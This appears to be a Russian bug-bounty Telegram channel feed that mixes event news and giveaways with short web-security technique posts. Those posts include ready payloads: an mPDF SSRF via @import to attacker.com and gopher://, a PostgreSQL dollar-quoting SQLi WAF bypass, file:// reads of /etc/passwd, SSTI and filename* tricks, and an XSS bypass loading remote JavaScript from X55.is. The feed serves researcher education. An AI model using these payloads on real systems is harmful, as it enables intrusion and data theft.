SHADOW:Group

В эту пятницу планирую посетить конференцию Периметр от Metascan'a и вечером на оффлайн часть Bugs Zone. Если будет кто из подписчиков и знакомых, пишите, буду рад пообщаться 👀

Race Condition одна из тех уязвимостей, которая порой позволяет находить баги там, где их совсем не ждешь. И иногда, чтобы получить какой-нибудь IDOR, достаточно очень много раз попросить об этом приложение. В кейсе на скрине, как раз такой случай. При указании чужого id получаем ошибку, однако, если запустить intruder и подождать несколько тысяч запросов, сервер внезапно начинает отдавать нам чужие ПД. #web #race #idor

Стартовал прием заявок на Pentest Award 2026 и в этом году появилась новая номинация - AI. Думаю, за последний год у многих есть что сказать по этой теме. Остальные номинации также на месте: Kill Chain, Системный взлом (Web & Logic), Device и Out of Scope. Среди призов стандартно респект от комьюнити и техника Apple. Заявки принимают до 12 июля, а церемония награждения пройдет 14 августа в мск. https://t.me/justsecurity/441

🪲 Топовый мерч, две недели закрытого скоупа, ламповая афтепати-вечеринка… Все это ждет вас на нашем любимом приватном ивенте — BUGS ZONE 7.0. Приглашения, как обычно, отправим багхантерам с лучшими результатами за сезон. 🔵Старт хантинга — 15 апреля. 🔵Церемония и афтепати — 22 мая в Москве. Попасть на ивент может каждый. Сдавайте отчеты на нашей платформе и качайте рейтинг — мы обязательно заметим самых активных. Скоро поделимся подробностями. Следите за апдейтами!

У mPDF есть интересная особенность, которая может вам когда-нибудь пригодиться. Если передать движку строку с @import url(...), он делает внешний запрос, даже если HTML полностью экранирован htmlentities() и даже без <style>. Причина проста: mPDF ищет URL-ы через регулярки по всему входу. Поэтому достаточно вставить: @import url(https://attacker.com/test?.css) и сервер сразу пойдёт по указанному адресу. Плюс можно использовать и нестандартные протоколы вроде gopher://, превращая это в SSRF с возможностью дергать внутренние сервисы. Вендор же официально заявил, что это не баг, а фича, и устранять поведение не собирается - по их мнению, движок должен загружать указанные URL, а ответственность за реализацию лежит на разработчиках. #web #ssrf #pdf

Искал тут что посмотреть под еду на ютубе, и реки вывели мне сей шедевр. Прекрасно все, начиная с кулстори самого проекта, который форсили во многих изданиях, заканчивая сайтом на пыхе с паролями юзеров в открытом виде. https://www.youtube.com/watch?v=HGbP2ibfm8k

Иногда, когда читаешь раскрытый репорт или статью на Medium об уязвимости в багбаунти, хочется потрогать это руками и заложить у себя в навыках ту или иную багу немного глубже.😵‍💫 Так вот, в итоге из этой мысли я сделал: https://labs.hackadvisor.io/ Все машинки собраны из публичных репортов и статей ресерчеров. Сейчас можно разворачивать стенд, решать задачи, получать подсказки и разбор уязвимости по итогу. Буду потихоньку пилить интересные машинки из раскрытых отчётов — надеюсь, вы тоже закинете что-то интересное: оно обязательно появится. Сразу дисклеймер: у меня пока небольшой опыт в создании таких заданий, так что где-то может быть шероховато. Но со временем буду делать лучше — и сами задания, и их подачу — и добавлять больше интересных сценариев. В целом Labs — это всего лишь MVP и первый этап будущей полноценной экосистемы HackAdvisor, которая, как и всё для сообщества, совершенно бесплатна. Всех обнял, жду фидбек, баги и фича-реквесты🙌🏻 Ну и, пожалуйста, не ломайте сам Labs (даже если очень хочется) — пока там всё очень хрупко 🫠

Захват аккаунта через telegram-бот: от своего номера к чужому профилю Всего пять минут ожидания, один чужой номер телефона и обычная кнопка для получения ссылки — этого оказалось достаточно, чтобы обнаружить критическую уязвимость. Настолько минимальный сценарий неожиданно вскрыл проблему в логике обработки данных. Читать 👉 https://blog.deteact.ru/account-takeover-thru-telegram-bot/

Друзья, поздравляю вас с наступающим Новым годом 🎄 Пусть он принесёт больше спокойствия, уверенности в себе и своих идеях, новых положительных эмоций и ощущения, что вы идёте в правильном направлении. Желаю интересных и результативных находок, роста там, где вам действительно важно, и достижения новых высот. Постарайтесь отдохнуть в эти праздники и набраться сил. Пусть в новом году всё станет хотя бы немного лучше, чем в прошлом. Спасибо, что вы здесь. Увидимся в 2026 ❤️

кстати, это я) узнали? согласны?

Вот с таким интересным принтом получил футболку от ребят из BI.ZONE Bug Bounty. Говорят, если присмотреться, то можно увидеть на нем множество знакомых лиц из багбаунти сообщества. Я узнал примерно половину)

Недавно занял 2 место в приватном ивенте от ТБанка. Ребята порадовали интересным скоупом и достойными выплатами за что им большой респект 😎

Проснулся, а тут RCE в React Server Functions с одного запроса уже выполняется. Жаркие споры вчера не прошли напрасно. https://gist.github.com/maple3142/48bc9393f45e068cf8c90ab865c0f5f3 https://github.com/msanft/CVE-2025-55182 #web #rce #react

Осознал что не все подписаны на меня в соц сети Илона Маска, поэтому возможно буду дублировать сюда некоторые посты На выходных нашел SQLi в PostgreSQL приложении. Обычно я не пишу про такие находки, но этот случай показался достаточно интересным. Инъекция была path-based (/api/v2/.../INJECTION_POINT/...), и путь не url декодился. Пробелы, слеши, кавычки и скобки приводили к 400 Bad Request. Придумал обход используя dollar-quoting синтаксис PostgreSQL:

$$0$$OR-0-$$0$$NOTNULL

Как PostgreSQL это парсит: 1. $$0$$ - dollar-quoted строка, автоматически каститься в integer 2. OR - логический оператор 3. -0-$$0$$ - арифметическое выражение 4. NOTNULL - проверка на null (вернет true) Для этого payload нужны всего два не alphanumeric символа: $ и - (минус можно заменить на +). Может быть полезно для обхода WAF (например, Cloudflare это не блокирует) или при похожих ограничениях на символы.

file://localhost/etc/passwd что вернёт? Да, вернётся /etc/passwd. В RFC 8089, верный формат протокола описан как file://<host>/<path>, в то время как все шпоры на LFR при SSRF говорят лишь о file:///<path> Причём, в <host> возможно вписать домен. Система резолвнет его, и если тот указывает на 127.0.0.1, то вернётся содержимое файла. В противном случае получишь лишь отстук в DNS. питон пок

from urllib.request import urlopen

content = urlopen(
  "file://yoogle.com/etc/passwd", timeout=2,
  ).read().decode('utf-8')

print(content)

Представил сколько возможностей для обхода фильтров? И это не последний твой приступ FOMO за сегодня. В статье The Minefield Between Syntaxes от @yeswehack, автор вскрывает проблемы разных синтаксисов и как парсеры выживают с ними.

Представим, ты нашёл SSTI, но WAF блокирует символ $ Что делать?

Неприятно, но не критично, ведь в Python / Perl возможно представить символ через \N{CHARACTER NAME}. Пример обхода фильтра

\N{dollar sign}{7*7} == ${7*7} == 49

Уже на стену лезешь? Погоди, я с тобой ещё не закончил. Давай дальше по загрузке файлов. Видел же в Content-Disposition есть параметр filename? В RFC 6266 описан базовый подход с именем файла, но RFC 8187 вышибает дверь с... чего.. какие юникод байты 😱

# RFC 6266
filename="image.png"

# RFC 8187
filename*=UTF8''image%0a.png

RFC 8187 вводит новые правила для filename параметра, включая поддержку всего Unicode + способности кодировать произвольные байты через % То есть, ты можешь закодировать перенос строки (%0a == \n) и всячески ломать как парсинг имени файла, так и куда тот запишется. . . . FOMO карусель закрыта. Как восстановишь силы, пробегись по статье автора ради:

⚀ разбор CVE из-за проблем синтаксиса [^] ⚀ кейс бб, из cache poisoning в stored xss через пролом валидации parse_url в PHP [^] ⚀ кейс бб, из слепого чтения файлов через SSRF в arbitrary file read [^]

Затем разнеси CTF по ресерчу

1. обход фильтров SSTI [^] 2. иной подход к протоколу file:// [^] 3. пролом parse_url в PHP [^]

#web #waf_bypass

Решили раздать еще 2 проходки

Выбор дополнительных победителей (в количестве 2): 🏆 Победители: 1. Alexey (@AlexeyInfosec) 2. Evktolly (@evktolly) ✔️Проверить результаты

🎉 Результаты розыгрыша: 🏆 Победители: 1. Kot (@cyber_meow) 2. Rechnoj (@rechnoj) 3. Artur (@artur_almaev) ✔️Проверить результаты

Недавно попалось приложение, которое не давало мне проэксплуатировать XSS. WAF тригерился на использование большинства функций и ключевых слов, таких как alert, document.cookie и других. В таких случаях часто на помощь приходит функция import(), которая позволяет подгружать JS-скрипты из внешнего модуля. Более подробно c этой функцией можете ознакомиться в документации. Для эксплуатации я использовал пэйлоад Javascript:import('//X55.is')// который через import() выполняет загрузку вредоносного JS-модуля, размещенного на сайте X55.is. Данный модуль выполняет обычный alert. Кроме того, с его помощью можно удобно выполнить любой код, указав его через символ #. Все, что будет после #, не будет видно на сервере, что поможет обойти WAF, а модуль в import считает содержимое из document.location.hash и выполнит код.

javascript:import('//X55.is')//#alert('shdw')

#web #waf #xss

🐞 Розыгрыш проходки на церемонию награждения BUGS ZONE 6.0 20 октября начнется любимый многими багхантерами BUGS ZONE 6.0. Традиционно нас ждет приватный скоуп, мерч, церемония награждения и мощное афтепати. Потому запускаю розыгрыш 3 проходок на церемонию награждения, которая пройдет 7 ноября в Москве. Условия простые: 1️⃣ Быть багхантером (достаточно одного оплаченного репорта за последний год на любой платформе). Отдельно попрошу пруфы у победителей в личке. 2️⃣ Быть подписанным на мой канал Итоги подведу 19 октября - победитель получит приглашение на церемонию награждения BUGS ZONE 6.0 и сможет лично встретиться с командой платформы, триажерами и топовыми хантерами сезона. Следите за апдейтами и удачи всем!